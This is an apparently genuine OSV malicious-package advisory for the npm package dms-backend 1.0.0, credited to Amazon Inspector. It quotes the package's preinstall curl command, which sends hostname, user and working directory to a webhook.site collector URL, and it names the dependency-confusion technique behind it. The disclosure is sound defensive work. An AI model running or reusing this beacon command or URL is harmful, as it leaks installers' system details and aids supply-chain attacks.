{"id":"MAL-2026-5826","summary":"Malicious code in dms-backend (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e)\npackage.json declares a preinstall lifecycle script that runs `curl --data-urlencode \"info=$(hostname && whoami && pwd)\"` against a webhook.site collector URL (https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/dms-backend). This fires automatically on `npm install` and leaks installer-side identifiers — hostname, current OS user, and install working directory — to an attacker-controlled webhook bin. The package ships no real functionality; the preinstall recon beacon is the package's only behavior, which is the canonical shape of a dependency-confusion reconnaissance probe (the name `dms-backend` suggests targeting an internal/private registry name to hijack installs of an organization's private package).\n","modified":"2026-06-15T20:31:54.474164982Z","published":"2026-06-15T20:08:26Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-06-15T20:14:29.220997713Z","id":"IN-MAL-2026-006700","modified_time":"2026-06-15T20:08:26Z","sha256":"bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e","versions":["1.0.0"],"source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/dms-backend/v/1.0.0"}],"affected":[{"package":{"name":"dms-backend","ecosystem":"npm","purl":"pkg:npm/dms-backend"},"versions":["1.0.0"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dms-backend/MAL-2026-5826.json","indicators":{"evidence_files":[{"tlsh":"07d02bf00e7063735edd86b02d21b158e5345b0f00d46a085ad20114608a1ea205b6ae","path":"package.json","sha256":"338916c2e01099c0c8e71d8487d254cbc1fcddd66db3984107bd982cf115719d"}],"package_integrity":[{"hashes":{"sha1":"473fe5739d7e7ca5b6957482779cbc835efe5d90","sha512_sri":"sha512-0RqwX1ewwpUniSryKqXKYkw+WJztsL8b+myU54BZHz6BUiTm6/86ZIrboYpGinKFbqqJcL8MIDTLs+52pqcZNg=="},"filename":"dms-backend-1.0.0.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}